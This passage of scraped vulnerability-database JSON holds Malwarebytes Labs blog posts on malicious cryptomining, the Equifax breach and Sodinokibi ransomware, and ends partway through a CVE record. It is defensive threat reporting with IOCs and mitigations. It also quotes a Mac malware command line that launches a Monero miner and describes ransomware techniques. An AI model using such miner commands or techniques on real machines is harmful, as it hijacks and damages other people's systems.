Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. 
But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. 
Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. 
Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. 
Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. 
The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. 
While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn addition to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and a weakness in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code into each web session. 
This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. 
Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some respects, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be underestimated. Indeed, unmanaged miners could seriously disrupt business- or infrastructure-critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-26T16:08:03", "type": "malwarebytes", "title": "The state of malicious cryptomining", 
"bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-14T17:30:57", "description": "### [updates 9/14/2017]\n\nEquifax has released information and confirmed the vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) that was used in this breach after several days of intense scrutiny around Apache Struts. To make matters worse, there already was a patch available for this flaw in March 2017, two months prior to the incident.\n\n_**1) Updated information on U.S. website application vulnerability.**_ \n_Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. 
We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement._\n\n### [updates 9/12/2017]\n\nEquifax's efforts in response to this incident can be followed at www.equifaxsecurity2017.com, but the[ site has been called](<https://krebsonsecurity.com/2017/09/equifax-breach-response-turns-dumpster-fire/>) \"completely broken at best, and little more than a stalling tactic or sham at worst.\" And [ isn\u2019t working for many people](<https://www.businessinsider.nl/equifax-data-breach-site-check-angry-response-2017-9/>). So, we leave it up to your best judgment whether you should pay that site a visit .\n\nOver 30 lawsuits have been filed against Equifax following the breach [according to Reuters](<http://www.reuters.com/article/us-equifax-cyber-lawsuits/lawsuits-against-equifax-pile-up-after-massive-data-breach-idUSKCN1BM2E3>).\n\n[Quartz reported](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) that the vulnerability they mentioned was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. The vulnerability announced on Sept. 4 has existed in Struts since 2008.\n\nApache responded to that report with [this Apache Struts Statement on Equifax Security Breach](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>).\n\n \n\nOn July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. 
The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax's overall security posture.\n\n[According to Equifax](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), online criminals maintained their presence from mid-May through July 2017 and had access to:\n\n * Names\n * Social Security numbers\n * Birth dates\n * Addresses\n * Driver\u2019s license numbers (in some cases)\n * Credit card numbers (for approx. 209,000 U.S. consumers)\n\nIt also said that some personal information for certain UK and Canadian residents was part of this breach.\n\nThis is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.\n\nEquifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. 
More information about this breach and how to apply for ID theft protection can be found by going to [equifaxsecurity2017.com](<https://www.equifaxsecurity2017.com/>), a website Equifax has just set up.\n\nThe post [Equifax breach: What you need to know [updated]](<https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-08T07:02:47", "title": "Equifax breach: What you need to know [updated]", "type": "malwarebytes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-08T07:02:47", "id": "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "href": "https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-22T14:43:19", "description": "Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among 
[cybersecurity professionals](<https://www.tesorion.nl/aconnection-between-the-sodinokibi-and-gandcrab-ransomware-families/>) because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.\n\nDetected by Malwarebytes as [Ransom.Sodinokibi](<https://blog.malwarebytes.com/detections/ransom-sodinokibi/>), Sodinokibi is a [ransomware-as-a-service](<https://blog.malwarebytes.com/glossary/ransomware-as-a-service/>) (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We've watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid-June and mid-July. Based on our telemetry, Sodinokibi has been on the rise since GandCrab's exit at the end of May.\n\nBusiness and consumer detection trends for Sodin/REvil from May 2019 until present\n\nOn May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.\n\n\u201cWe are leaving for a well-deserved retirement,\u201d a GandCrab RaaS administrator announced. (Courtesy of security researcher [Damian](<https://twitter.com/Damian1338B/>) on Twitter) \n\nWhile many may have heaved sighs of relief at GandCrab's \"passing,\" some expressed [skepticism](<https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html>) over whether the team would truly put their successful money-making scheme behind them. What followed was bleak anticipation of another ransomware operation\u2014or a re-emergence of the group peddling new wares\u2014taking over to fill the hole GandCrab left behind. \n\n### Enter Sodinokibi\n\nPutting a spin on an old product is a concept not unheard of in legitimate business circles. 
Often, spinning involves creating a new name for the product, some tweaking of its existing features, and finding new influencers\u2014\"affiliates\" in the case of RaaS operations\u2014to use (and market) the product. In addition, threat actors would initially limit the new product\u2019s availability and follow with a brand-new marketing campaign\u2014all without touching the product standard. In hindsight, it seems the GandCrab team has taken this route.\n\nA month before the GandCrab retirement announcement, Cisco Talos researchers [released](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>) information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting [a zero-day vulnerability](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>) in its Oracle WebLogic application.\n\nTo date, six versions of Sodinokibi has been seen in the wild.\n\nSodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8 \n\n### Sodinokibi infection vectors \n\nLike GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:\n\n * Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725\n * Malicious spam or phishing campaigns with links or attachments\n * [Malvertising](<https://blog.malwarebytes.com/glossary/malvertising/>) campaigns that lead to the RIG exploit kit, [an avenue that GandCrab used before](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>)\n * Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en-masse. 
This is done by accessing networks via a remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.\n\nAlthough affiliates used these tactics to push GandCrab, too, many cybercriminals\u2014[nation-state actors included](<https://www.cvent.com/events/awareness-briefing-chinese-cyber-activity-targeting-managed-service-providers/archived-4b6946484ee141ac8ebe76047f198e1c.aspx>)\u2014have done the same to push their own malware campaigns.\n\n### Symptoms of Sodinokibi infection \n\n\n\nSystems infected with Sodinokibi ransomware show the following symptoms:\n\n**Changed desktop wallpaper.** Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:\n\n> All of your files are encrypted! \nFind {5-8 alpha-numeric characters}-readme.txt and follow instructions\n\n**Presence of ransomware note.** The _{5-8 alpha-numeric characters}-readme.txt_ file it's referring to is the ransom note that comes with every ransomware attack. In Sodinokibi\u2019s case, it looks like this:\n\n\n\nThe note contains instructions on how affected users can go about paying the ransom and how the decryption process works.\n\nScreenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments \n\n**Encrypted files with a 5\u20138 character extension name.** Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that's five to eight characters long.\n\nThe extension name and character string included in the ransom note file name are the same. 
For example, if Sodinokibi has encrypted an image file and renamed it to _paris2017.r4nd01_, its corresponding ransom note will have the file name _r4nd01-readme.txt_.\n\nSodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:\n\n * .jpg\n * .jpeg\n * .raw\n * .tif\n * .png\n * .bmp\n * .3dm\n * .max\n * .accdb\n * .db\n * .mdb\n * .dwg\n * .dxf\n * .cpp\n * .cs\n * .h\n * .php\n * .asp\n * .rb\n * .java\n * .aaf\n * .aep\n * .aepx\n * .plb\n * .prel\n * .aet\n * .ppj\n * .gif\n * .psd \n\n**Deleted shadow copy backups and disabled Windows Startup Repair tool.** Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is \u201ca snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,\u201d [according to Windows Dev Center](<https://docs.microsoft.com/en-us/windows/win32/vss/shadow-copies-and-shadow-copy-sets>). The latter is a recovery tool used to troubleshoot certain Windows problems.\n\nDeleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.\n\n### Other tricks up Sodinokibi\u2019s sleeve\n\nRansomware doesn\u2019t normally take advantage of zero-day vulnerabilities in their attacks\u2014but Sodinokibi is not your average ransomware. It takes advantage of an elevated privilege zero-day vulnerability in the Win32k component file in Windows. \n\nDesignated as [CVE-2018-8453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453>), this flaw can grant Sodinokibi administrator access to the endpoints it infects. 
This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.\n\nCVE-2018-8453 was the same vulnerability that [the ](<https://threatpost.com/fruityarmor-apt-exploits-yet-another-windows-graphics-kernel-flaw/138192/>)[FruitArmor](<https://threatpost.com/fruityarmor-apt-exploits-yet-another-windows-graphics-kernel-flaw/138192/>)[ APT](<https://threatpost.com/fruityarmor-apt-exploits-yet-another-windows-graphics-kernel-flaw/138192/>) exploited in its malware campaign last year.\n\nNew variants of Sodinokibi have also been found to use \u201cHeaven\u2019s Gate,\u201d an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected [an interesting cryptominer](<https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/>) we captured in the wild.\n\n### Protect your system from Sodinokibi\n\nMalwarebytes tracks Sodinokibi campaigns and protects [premium consumer users](<http://www.malwarebytes.com/premium>) and business users with [signature-less detection](<https://www.malwarebytes.com/business/endpointprotectionandresponse/>), nipping the attack in the bud before the infection chain even begins. Users of our free version are not protected from this threat without real-time protection.\n\n\n\nWe recommend consumers take the following actions if they are not premium Malwarebytes customers:\n\n * Create secure backups of your data, either on an external drive or [on the cloud](<https://blog.malwarebytes.com/101/2016/04/should-you-store-your-data-in-the-cloud/>). 
Be sure to detach your external drive from your computer once you've saved all your information, as it, too, could be infected if still connected.\n * Run updates on all your systems and software, patching for any vulnerabilities.\n * Be aware of suspicious emails, especially those that contain links or attachments. Read up on [how to detect phishing attempts](<https://blog.malwarebytes.com/101/2017/06/somethings-phishy-how-to-detect-phishing-attempts/>) both on your computer and your [mobile devices](<https://blog.malwarebytes.com/101/2018/12/something-else-phishy-detect-phishing-attempts-mobile/>).\n\nTo mitigate on the business side, we also recommend IT administrators to do the following:\n\n * Deny public IPs access to RDP port 3389.\n * Replace your company\u2019s ConnectWise ManagedITSync integration plug-in with [the latest version](<https://marketplace.connectwise.com/kaseya>) before reconnecting your VSA server to the Internet.\n * Block SMB port 445. In fact, it\u2019s sound security practice to block all unused ports.\n * Apply the latest Microsoft update packages.\n * In this vein, make sure all software on endpoints is up-to-date.\n * Limit the use of system administration tools to IT personnel or employees who need access only.\n * Disable macro on Microsoft Office products.\n * Regularly inform employees about threats that might be geared toward the organization\u2019s industry or the company itself with reminders on [how to handle suspicious emails](<https://blog.malwarebytes.com/101/2018/06/five-easy-ways-to-recognize-and-dispose-of-malicious-emails/>), such as avoiding clicking on links or opening attachments if they\u2019re not sure of the source.\n * Apply attachment filtering to email messages.\n * Regularly create multiple backups of data, preferably to devices that aren\u2019t connected to the Internet. 
\n\n### Indicators of compromise (IOCs)\n\nFile hashes:\n\n * e713658b666ff04c9863ebecb458f174\n * bf9359046c4f5c24de0a9de28bbabd14\n * 177a571d7c6a6e4592c60a78b574fe0e\n\nStay safe, everyone!\n\nThe post [Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void](<https://blog.malwarebytes.com/threat-spotlight/2019/07/threat-spotlight-sodinokibi-ransomware-attempts-to-fill-gandcrab-void/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-18T17:58:26", "type": "malwarebytes", "title": "Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8453", "CVE-2019-2725"], "modified": "2019-07-18T17:58:26", "id": "MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C", "href": "https://blog.malwarebytes.com/threat-spotlight/2019/07/threat-spotlight-sodinokibi-ransomware-attempts-to-fill-gandcrab-void/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-07T14:40:05", "description": "Vulnerability 
in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10271", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": 